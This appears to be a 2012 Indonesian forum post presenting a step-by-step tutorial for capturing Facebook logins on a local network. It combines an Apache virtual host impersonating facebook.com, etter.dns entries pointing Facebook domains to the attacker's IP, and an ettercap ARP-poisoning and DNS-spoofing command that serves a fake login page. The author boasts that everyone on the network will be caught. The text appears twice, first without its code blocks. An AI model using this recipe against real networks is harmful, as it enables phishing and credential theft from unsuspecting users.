06-26-2012, 11:03 AM
semoga saja nggak salah room nih soalnya bingung mau taruh dimana . berhubung ini tutorial, jadi saya taruh disini
saya cuman mengembangkan tutorialnya bang zee yang mengenain dns_spoofing dengan ettercap yang kemudian dikombinasikan dengan apache2 yang akan menjadi sebuah fakelogin hampir semua situs di internet (kalau nggak males buat fakeloginnya )
okedah... kita mulai. pertama buat virtualhost dengan apache :
kemudian edit file hasil kopi an tadi
yang perlu diganti berikut ini :
Yang perlu diganti & diisi :
ServerName = nama domain utama
ServerAlias = nama domain lainnya (jika perlu)
DocumentRoot /var/www/fake/facebook/ = lokasi kita meletakkan fakelogin
<Directory /var/www/fake/facebook/> = yang ini juga sama dg yg atas
save kemudian enable site tersebut dengan perintah
lalu letakkan halaman fake ke direktori tersebut, langsung deh kita eksekusi si ettercap. jangan lupa edit dulu file etter.dns nya dahulu
tambahin baris ini paling bawah
dan kemudian jalankan si ettercap
yap... dengan teknik ini, setiap header http yang mengarah ke situs tersebut akan ditangkap dengan service apache2 sehingga diarahkan ke virtualhost-nya.
kita bisa membuat fakelogin lagi dengan mengcopy /etc/apache2/sites-available/default dan mengkonfigurasinya seperti diatas, memberi folder pribadi dan spoofing alamatnya.
nah... kalau begini kan semua yang dijaringan kita akan terkena fakelogin. B)
saya cuman mengembangkan tutorialnya bang zee yang mengenain dns_spoofing dengan ettercap yang kemudian dikombinasikan dengan apache2 yang akan menjadi sebuah fakelogin hampir semua situs di internet (kalau nggak males buat fakeloginnya )
okedah... kita mulai. pertama buat virtualhost dengan apache :
Code:
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/facebook
kemudian edit file hasil kopi an tadi
Code:
vi /etc/apache2/sites-available/facebook
yang perlu diganti berikut ini :
Code:
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName www.facebook.com
ServerAlias facebook.com
ServerAlias id-id.facebook.com
DocumentRoot /var/www/fake/facebook/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/fake/facebook/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>
Yang perlu diganti & diisi :
ServerName = nama domain utama
ServerAlias = nama domain lainnya (jika perlu)
DocumentRoot /var/www/fake/facebook/ = lokasi kita meletakkan fakelogin
<Directory /var/www/fake/facebook/> = yang ini juga sama dg yg atas
save kemudian enable site tersebut dengan perintah
Code:
a2ensite facebook
service apache2 start
lalu letakkan halaman fake ke direktori tersebut, langsung deh kita eksekusi si ettercap. jangan lupa edit dulu file etter.dns nya dahulu
tambahin baris ini paling bawah
Code:
www.facebook.com A [ip kita]
facebook.com A [ip kita]
id-id.facebook.com [ip kita]
dan kemudian jalankan si ettercap
Code:
ettercap -Tqi wlan0 -P dns_spoof -M arp // //
yap... dengan teknik ini, setiap header http yang mengarah ke situs tersebut akan ditangkap dengan service apache2 sehingga diarahkan ke virtualhost-nya.
kita bisa membuat fakelogin lagi dengan mengcopy /etc/apache2/sites-available/default dan mengkonfigurasinya seperti diatas, memberi folder pribadi dan spoofing alamatnya.
nah... kalau begini kan semua yang dijaringan kita akan terkena fakelogin. B)